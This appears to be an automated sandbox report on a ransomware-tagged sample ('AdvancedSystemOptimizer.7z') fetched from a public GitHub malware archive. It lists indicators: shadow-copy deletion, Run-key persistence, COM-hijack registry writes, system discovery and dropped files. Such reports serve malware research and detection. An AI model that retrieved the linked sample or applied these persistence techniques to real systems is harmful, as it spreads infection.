Malware Analysis Report

2024-11-30 13:55

Sample ID 240809-3m7ersveqm
Target https://github.com/Endermanch/MalwareDatabase/blob/master/davepl/AdvancedSystemOptimizer.7z
Tags
wannacry defense_evasion discovery evasion execution impact persistence privilege_escalation ransomware spyware stealer trojan upx worm
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file https://github.com/Endermanch/MalwareDatabase/blob/master/davepl/AdvancedSystemOptimizer.7z was found to be: Known bad.

Malicious Activity Summary

wannacry defense_evasion discovery evasion execution impact persistence privilege_escalation ransomware spyware stealer trojan upx worm

Wannacry

Deletes shadow copies

Downloads MZ/PE file

Executes dropped EXE

Checks BIOS information in registry

Modifies file permissions

Event Triggered Execution: Component Object Model Hijacking

UPX packed file

Reads user/profile data of web browsers

Loads dropped DLL

Checks installed software on the system

Checks whether UAC is enabled

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

Network Share Discovery

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Drops file in System32 directory

Drops file in Program Files directory

Subvert Trust Controls: Mark-of-the-Web Bypass

Event Triggered Execution: Netsh Helper DLL

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Modifies registry class

Opens file in notepad (likely ransom note)

NTFS ADS

Uses Task Scheduler COM API

Modifies registry key

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Views/modifies file attributes

Suspicious behavior: GetForegroundWindowSpam

Checks processor information in registry

Suspicious use of FindShellTrayWindow

Runs .reg file with regedit

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-09 23:38

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-09 23:38

Reported

2024-08-09 23:51

Platform

win11-20240802-en

Max time kernel

380s

Max time network

709s

Command Line

"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://github.com/Endermanch/MalwareDatabase/blob/master/davepl/AdvancedSystemOptimizer.7z"

Signatures

Wannacry

ransomware worm wannacry

Deletes shadow copies

ransomware defense_evasion impact execution

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\PROGRA~2\REGIST~1\RegClean.exe N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Loads dropped DLL

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLJ8DC2.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
N/A N/A C:\PROGRA~2\REGIST~1\RegClean.exe N/A
N/A N/A C:\PROGRA~2\REGIST~1\RegClean.exe N/A
N/A N/A C:\PROGRA~2\REGIST~1\RegClean.exe N/A
N/A N/A C:\PROGRA~2\REGIST~1\RegClean.exe N/A
N/A N/A C:\PROGRA~2\REGIST~1\RegClean.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Windows\CurrentVersion\Run\Registry Cleaner = "C:\\PROGRA~2\\REGIST~1\\RegClean.exe" C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Windows\CurrentVersion\Run\Registry Cleaner = "C:\\PROGRA~2\\REGIST~1\\Regclean.exe" C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Windows\CurrentVersion\Run\SOProc_SoRefRegSoAlertWxLiteNnAj = "rundll32 shell32.dll,ShellExec_RunDLL C:\\PROGRA~2\\SOFTWA~1\\soproc.exe -pack SoRefRegSoAlertWxLiteNnAj" C:\PROGRA~2\SOFTWA~1\soproc.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Windows\CurrentVersion\Run\Registry Cleaner = "C:\\PROGRA~2\\REGIST~1\\RegClean.exe" C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Windows\CurrentVersion\Run\Registry Cleaner = "C:\\PROGRA~2\\REGIST~1\\Regclean.exe" C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\PROGRA~2\REGIST~1\RegClean.exe N/A

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

defense_evasion

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Network Share Discovery

discovery

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\GLBSINST.%$D C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\7-Zip\Lang\sq.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\PROGRA~2\REGIST~1\INSTALL.LOG C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
File opened for modification C:\Program Files\7-Zip\Lang\mng.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\nb.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File created C:\Program Files (x86)\Registry Cleaner Trial\~GLH0007.TMP C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
File opened for modification C:\Program Files\7-Zip\Lang\ko.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\7zFM.exe C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files (x86)\Registry Cleaner Trial\UNWISE.EXE C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
File opened for modification C:\Program Files\7-Zip\Lang\sk.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\7-zip.dll C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ru.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\sw.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\tg.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\uz-cyrl.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\7z.exe C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\eu.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\fy.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\PROGRA~2\REGIST~1\RegClean.exe C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
File created C:\Program Files (x86)\Registry Cleaner Trial\~GLH000c.TMP C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
File opened for modification C:\PROGRA~2\REGIST~1\regclean.dll C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
File created C:\Program Files (x86)\Registry Cleaner Trial\~GLH0005.TMP C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
File opened for modification C:\Program Files (x86)\Registry Cleaner Trial\regclean.dll C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
File opened for modification C:\Program Files (x86)\Registry Cleaner Trial\Registry Cleaner.chm C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
File opened for modification C:\Program Files\7-Zip\Lang\es.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Uninstall.exe C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\gl.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\readme.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\fr.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\sr-spl.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\lij.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\nn.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\tk.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File created C:\Program Files (x86)\Registry Cleaner Trial\~GLH0008.TMP C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
File created C:\Program Files (x86)\Registry Cleaner Trial\~GLH0002.TMP C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
File opened for modification C:\Program Files (x86)\Registry Cleaner Trial\soref.dll C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
File opened for modification C:\Program Files\7-Zip\Lang\cy.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\hu.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files (x86)\Registry Cleaner Trial\License.rtf C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
File opened for modification C:\Program Files\7-Zip\Lang\lt.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\nl.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\tr.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File created C:\Program Files (x86)\Registry Cleaner Trial\~GLH000a.TMP C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
File opened for modification C:\Program Files\7-Zip\Lang\ca.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\io.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\is.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\si.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\sr-spc.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\sv.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\bn.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\mk.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\uz.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\vi.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\yo.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\7zCon.sfx C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File created C:\Program Files (x86)\Registry Cleaner Trial\~GLH0003.TMP C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
File opened for modification C:\Program Files\7-Zip\Lang\ba.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\pt.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ga.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\kk.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ta.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File created C:\Program Files (x86)\SoftwareOnline\~GLH0006.TMP C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A
File opened for modification C:\Program Files\7-Zip\Lang\af.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ext.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files (x86)\Registry Cleaner Trial\UNWISE.EXE C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A

Subvert Trust Controls: Mark-of-the-Web Bypass

defense_evasion
Description Indicator Process Target
File created C:\Users\Admin\Downloads\7z2407-x64.exe:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Key opened \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\NetSh C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Key opened \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\NetSh C:\PROGRA~2\REGIST~1\RegClean.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\PROGRA~2\SOFTWA~1\soproc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\PROGRA~2\SOFTWA~1\soproc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\PROGRA~2\SOFTWA~1\soproc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\GLJ8DC2.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\PROGRA~2\SOFTWA~1\soproc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\[email protected] N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\[email protected] N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\PROGRA~2\SOFTWA~1\soproc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-KE31S.tmp\is-SUFUB.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\PROGRA~2\SOFTWA~1\soproc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\PROGRA~2\SOFTWA~1\soproc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\PROGRA~2\SOFTWA~1\soproc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Endermanch@RegistryCleaner_SOReferral.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\InProcServer32 C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\kJxnabybjqg = "TTxxv^YAQEcJJE\\hb" C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\qjggq = "l_G`xTwri`BbprPyWEe_Z[DNKa" C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip32.dll" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\ = "RasDlg LUA" C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09} C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\Elevation C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\InProcServer32\ThreadingModel = "Apartment" C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\zGljodoswbF = "|T^t@\\d{lC^NffBEn@z" C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\eocs = "brU[cvMGKCaIszBdCp" C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\zGljodoswbF = "|Tnt@\\d{lC^NffBEn@z" C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\Elevation\IconReference = "@%SystemRoot%\\system32\\rasdlg.dll,-562" C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\evewxZeC = "dv]erdCFAqArp@}b}sRorWd|LOtIgfU" C:\PROGRA~2\REGIST~1\RegClean.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\pujw = "[PQkCB^qCwvWutO[PEwYCZ`u\x7fVKqEza" C:\PROGRA~2\REGIST~1\RegClean.exe N/A
